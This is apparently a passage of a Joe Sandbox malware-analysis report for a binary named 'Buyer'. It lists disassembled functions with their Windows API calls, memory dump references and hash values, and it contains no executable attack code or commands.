                                                                                                    Function 00F7DB30 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F7DAF4: _free.LIBCMT ref: 00F7DB1D
                                                                                                    • _free.LIBCMT ref: 00F7DB7E
                                                                                                      • Part of subcall function 00F72D18: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4), ref: 00F72D2E
                                                                                                      • Part of subcall function 00F72D18: GetLastError.KERNEL32(01011DB4,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4,01011DB4), ref: 00F72D40
                                                                                                    • _free.LIBCMT ref: 00F7DB89
                                                                                                    • _free.LIBCMT ref: 00F7DB94
                                                                                                    • _free.LIBCMT ref: 00F7DBE8
                                                                                                    • _free.LIBCMT ref: 00F7DBF3
                                                                                                    • _free.LIBCMT ref: 00F7DBFE
                                                                                                    • _free.LIBCMT ref: 00F7DC09
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 5bed66935a953271b091b4d9d44be1d81363ccd6ac0d0396f486d9816b5a5bca
                                                                                                    • Instruction ID: ccb7db3bc4f24a318d1c7795958a8a13b9f333dbfd812d5c5c6c74acd4260e73
                                                                                                    • Opcode Fuzzy Hash: 5bed66935a953271b091b4d9d44be1d81363ccd6ac0d0396f486d9816b5a5bca
                                                                                                    • Instruction Fuzzy Hash: C3114F71544B05AAF570F7B0CC07FCB77AC6F40700F848816B2ADA6053DAEDF505A692
                                                                                                    Function 00FAE048 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FAE062
                                                                                                    • LoadStringW.USER32(00000000), ref: 00FAE069
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FAE07F
                                                                                                    • LoadStringW.USER32(00000000), ref: 00FAE086
                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FAE0CA
                                                                                                    Strings
                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00FAE0A7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                    • Opcode ID: 9eb2bb11d6902cbf6be1fcb9de3c7c1fddd22337b658f4fa6fd4569d84cd52c9
                                                                                                    • Instruction ID: a104f63f8c05cc7c288b272b9926a5f035559ed363e55147e587da81320db980
                                                                                                    • Opcode Fuzzy Hash: 9eb2bb11d6902cbf6be1fcb9de3c7c1fddd22337b658f4fa6fd4569d84cd52c9
                                                                                                    • Instruction Fuzzy Hash: E40181F690020C7FE711A7A0DD89FFB776CDB08300F0145A2B74AE2042EA749E84AB71
                                                                                                    Function 00FB103C Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InterlockedExchange.KERNEL32(0106DC88,0106DC88), ref: 00FB104C
                                                                                                    • EnterCriticalSection.KERNEL32(0106DC68,00000000), ref: 00FB105E
                                                                                                    • TerminateThread.KERNEL32(0106DC80,000001F6), ref: 00FB106C
                                                                                                    • WaitForSingleObject.KERNEL32(0106DC80,000003E8), ref: 00FB107A
                                                                                                    • CloseHandle.KERNEL32(0106DC80), ref: 00FB1089
                                                                                                    • InterlockedExchange.KERNEL32(0106DC88,000001F6), ref: 00FB1099
                                                                                                    • LeaveCriticalSection.KERNEL32(0106DC68), ref: 00FB10A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3495660284-0
                                                                                                    • Opcode ID: 91a014fa53cef9e1ac239076cc5b3cde4471b745285328a24c03751a552d718f
                                                                                                    • Instruction ID: 4bff7cfa119095094f51deb803a14e2d0cfffe01ce6fd55e70a99580f4c838fc
                                                                                                    • Opcode Fuzzy Hash: 91a014fa53cef9e1ac239076cc5b3cde4471b745285328a24c03751a552d718f
                                                                                                    • Instruction Fuzzy Hash: B4F0EC32443616BBD7522F64EE49BD6BB3AFF45353F801122F101958A0C77495A5EF90
                                                                                                    Function 00FC23E7 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00FC2547
                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FC2568
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC2579
                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00FC2662
                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00FC2613
                                                                                                      • Part of subcall function 00FA40D3: _strlen.LIBCMT ref: 00FA40DD
                                                                                                      • Part of subcall function 00FC39AB: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00FBF393), ref: 00FC39C7
                                                                                                    • _strlen.LIBCMT ref: 00FC26BC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                    • String ID:
                                                                                                    • API String ID: 3203458085-0
                                                                                                    • Opcode ID: b1f6dfbc944ebbaf28b4cd3113924a833554adb434c4fab2f4b70594a84259f8
                                                                                                    • Instruction ID: 4591292a7c5f775ecf5f2392358897014c20c9a16f135c227c324eb8a04ae128
                                                                                                    • Opcode Fuzzy Hash: b1f6dfbc944ebbaf28b4cd3113924a833554adb434c4fab2f4b70594a84259f8
                                                                                                    • Instruction Fuzzy Hash: 1EB1D231604301AFC314DF24CC96F2ABBA5EF85318F54854CF45A4B2A2DB75ED46EB92
                                                                                                    Function 00F463C7 Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00F463ED
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F4642E
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00F46456
                                                                                                    • GetClientRect.USER32(?,?), ref: 00F46594
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F465B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1296646539-0
                                                                                                    • Opcode ID: f805bb5cb3873942ff106e2f6f683d4fb432acdae2e8496800fa045a829b7d6d
                                                                                                    • Instruction ID: 3e47a41dcb220ae5781c5973aa337c031861e88e1316417602c851b74fbdc852
                                                                                                    • Opcode Fuzzy Hash: f805bb5cb3873942ff106e2f6f683d4fb432acdae2e8496800fa045a829b7d6d
                                                                                                    • Instruction Fuzzy Hash: D0B16879A0064ADBDB14DFB8C4807EABBF1FF58310F14841AE8AAD7254DB34E950EB51
                                                                                                    Function 00F70477 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __allrem.LIBCMT ref: 00F7037A
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F70396
                                                                                                    • __allrem.LIBCMT ref: 00F703AD
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F703CB
                                                                                                    • __allrem.LIBCMT ref: 00F703E2
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F70400
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1992179935-0
                                                                                                    • Opcode ID: 8cf0651829415527d5c628b1b57484c99734d042a52203334b1857180c4d1198
                                                                                                    • Instruction ID: 39d5a6963b9d937a975321674a80690dcf4ee5975f3dca05a2c1d5642aeb55a2
                                                                                                    • Opcode Fuzzy Hash: 8cf0651829415527d5c628b1b57484c99734d042a52203334b1857180c4d1198
                                                                                                    • Instruction Fuzzy Hash: 8881D972A00706DBE7209E68CC85B6A73E9AF41734F24C12FF519D6682EF74E940E752
                                                                                                    Function 00F7654E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F68629,00F68629,?,?,?,00F7679F,00000001,00000001,8BE85006), ref: 00F765A8
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F7679F,00000001,00000001,8BE85006,?,?,?), ref: 00F7662E
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F76728
                                                                                                    • __freea.LIBCMT ref: 00F76735
                                                                                                      • Part of subcall function 00F73B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F66A59,?,0000015D,?,?,?,?,00F68590,000000FF,00000000,?,?), ref: 00F73BA2
                                                                                                    • __freea.LIBCMT ref: 00F7673E
                                                                                                    • __freea.LIBCMT ref: 00F76763
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: a37e347dc3d4c5e863f95df6b5328c2b787a7601b18ac32b13eae6845476e4f5
                                                                                                    • Instruction ID: cf5b26953283130c58e76b10498320c71e920a15e22327f5b08c549e5463eafe
                                                                                                    • Opcode Fuzzy Hash: a37e347dc3d4c5e863f95df6b5328c2b787a7601b18ac32b13eae6845476e4f5
                                                                                                    • Instruction Fuzzy Hash: 0951F872A00656AFDB298F64CC81EBB77A9EF447A4F14862EFC08DA140DF34DC45E652
                                                                                                    Function 00FCC362 Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FCD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCBE35,?,?), ref: 00FCD13C
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD178
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD1E6
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD21C
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCC451
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FCC4AC
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCC4F1
                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00FCC520
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FCC57A
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00FCC586
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1120388591-0
                                                                                                    • Opcode ID: 70fb71d18e60ba1ad010652669298a7eaeeef36a18f4cd3bb03296c90be6f5c3
                                                                                                    • Instruction ID: 92dde5ca78c74c23848aa5aaa5a0bbaebf4b00162aaaa4abc7e6f28271dd8cef
                                                                                                    • Opcode Fuzzy Hash: 70fb71d18e60ba1ad010652669298a7eaeeef36a18f4cd3bb03296c90be6f5c3
                                                                                                    • Instruction Fuzzy Hash: D181C131508242AFC714DF24C995F2ABBE9FF84314F14895CF4598B2A2CB35ED46EB92
                                                                                                    Function 00FB987B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00FB9C54
                                                                                                    • _wcslen.LIBCMT ref: 00FB9C75
                                                                                                    • _wcslen.LIBCMT ref: 00FB9C9C
                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00FB9CF4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                    • String ID: X
                                                                                                    • API String ID: 83654149-3081909835
                                                                                                    • Opcode ID: 663c3ed3e5c32d7eb15adf5b3589103691a4ec7e482236bf5462fb638e94ff3f
                                                                                                    • Instruction ID: 0bc5d026e1f436808b1d2e4a44f5b4ed7f7837c5ee096bb1bd0769dd4d8a453e
                                                                                                    • Opcode Fuzzy Hash: 663c3ed3e5c32d7eb15adf5b3589103691a4ec7e482236bf5462fb638e94ff3f
                                                                                                    • Instruction Fuzzy Hash: 3FE1B3719083108FC714EF25C881BAABBE5BF84314F14896DF9899B2A2DB74DD05DF92
                                                                                                    Function 00FB6BFD Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00FB6C4B
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00FB6DA8
                                                                                                    • CoCreateInstance.OLE32(00FE0CE0,00000000,00000001,00FE0B50,?), ref: 00FB6DBF
                                                                                                    • CoUninitialize.OLE32 ref: 00FB7043
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                    • String ID: .lnk
                                                                                                    • API String ID: 886957087-24824748
                                                                                                    • Opcode ID: 8f22a52caaf3ea59f19015ac74627380ba17a09f904bf6f0c0cbd85f958248dd
                                                                                                    • Instruction ID: b9e53b3db2ae8d8cd623ac39e8286a9b24b67afccede809c3992a159e18387e9
                                                                                                    • Opcode Fuzzy Hash: 8f22a52caaf3ea59f19015ac74627380ba17a09f904bf6f0c0cbd85f958248dd
                                                                                                    • Instruction Fuzzy Hash: 14D15971608301AFD304EF25C881AABBBE8FF88714F14491DF5958B2A2DB74ED45DB92
                                                                                                    Function 00F59442 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00F59477
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F594DB
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00F594F8
                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F59509
                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00F59557
                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F977FA
                                                                                                      • Part of subcall function 00F5956F: BeginPath.GDI32(00000000), ref: 00F5958D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                    • String ID:
                                                                                                    • API String ID: 3050599898-0
                                                                                                    • Opcode ID: 15acdfddef5224f249a08f84ef65be178917fe62a45a0078f47ef603e01d86b7
                                                                                                    • Instruction ID: 848106332c17173518fb95f903f9bad6f21a593253327c0ac68718dc3c1b9e8a
                                                                                                    • Opcode Fuzzy Hash: 15acdfddef5224f249a08f84ef65be178917fe62a45a0078f47ef603e01d86b7
                                                                                                    • Instruction Fuzzy Hash: 8541E131509304DFDB21DF28CC84F767BE9EB45371F140229FAA8862A1D7799849EB62
                                                                                                    Function 00FB0EC0 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FB0EDD
                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00FB0F18
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00FB0F34
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00FB0FAD
                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00FB0FC4
                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FB0FF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3368777196-0
                                                                                                    • Opcode ID: 636315549f0bed71b791f47ef36b0025b79988cbb81e2fdac59baa6a156b4c54
                                                                                                    • Instruction ID: 16145e7272c86793c64091e317a2e2d2c886f0f3c1e839cc93441317764c9118
                                                                                                    • Opcode Fuzzy Hash: 636315549f0bed71b791f47ef36b0025b79988cbb81e2fdac59baa6a156b4c54
                                                                                                    • Instruction Fuzzy Hash: 6A419C71A00205EFDF15AF64DC85AABB779FF04310F1480A5F900AA29ADB34DE50EBA0
                                                                                                    Function 00FD88C7 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00F9F95A,00000000,?,?,00000000,?,00F82A40,00000004,00000000,00000000), ref: 00FD8938
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00FD895E
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00FD89BD
                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 00FD89D1
                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00FD89F7
                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00FD8A1B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
